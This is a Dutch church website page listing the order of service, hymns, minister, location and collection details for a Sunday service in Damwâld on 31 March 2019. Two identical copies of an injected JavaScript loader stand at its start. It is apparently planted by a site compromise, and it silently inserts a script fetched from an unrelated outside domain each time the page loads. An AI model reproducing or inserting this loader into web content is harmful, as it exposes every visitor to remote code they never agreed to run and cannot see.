;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 31 maart 2019 9:30 uur - PKN Damwâld
zondag 31 maart 2019
09:30 uur

Kerkdienst zondag 31 maart 2019 9:30 uur

Informatie

Voorganger:G.J. Otter
Organist:Jaap van der Horn
Liturgie
lied voor de dienst : Psalm 89 : 1 en 8
Welkom
Intochtslied Psalm 71 : 1 en 2
Stil gebed, Votum en groet
We zingen: Gezang 473 : 1, 6 en 7
Wetslezing .
We zingen: Elb 114 : 1, 3 en 7
Gebed
We lezen: Schriftlezing Lc.19: 1 - 10
We zingen: Psalm 139 : 14
Preek .
We zingen: Elb 203 : 1, 2 en 3
Dankzegging en voorbede
Collecte
Slotlied : Gezang 182 : 1 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Collecte Missionair

Pionieren rond zingevingsvraagstukken Verspreid over heel Nederland ontstaan nieuwe vormen van kerk zijn, zoals pioniersplekken en kliederkerken. Men zoekt naar nieuwe manieren om het Evangelie te delen en aan te sluiten bij zingevingsvragen. Zoals in Rotterdam waar in een vergrijzende wijk een Christelijke multiculturele gemeenschap is gestart. Doordeweeks zijn er allerlei activiteiten voor wijkbewoners, zoals kinderclub, taalles, maaltijden en kledingverkoop. Op zondag komt men bij elkaar voor Bijbelstudie of celebration. In de Kliederkerk ontdekken kinderen samen met hun ouders of grootouders op creatieve manieren de betekenis van Bijbelverhalen en wat geloven in God en het navolgen van Jezus betekent voor het alledaagse leven. Door elkaar regelmatig te ontmoeten ontstaat een nieuwe geloofsgemeenschap. Met de opbrengst van de collecte steunt de Protestantse Kerk pioniersplekken en kliederkerken, waar mensen de waarde van het Christelijk geloof en de kerk (opnieuw) kunnen ontdekken.

Tweede collecte: Kerk
Uitganscollecte: Kerk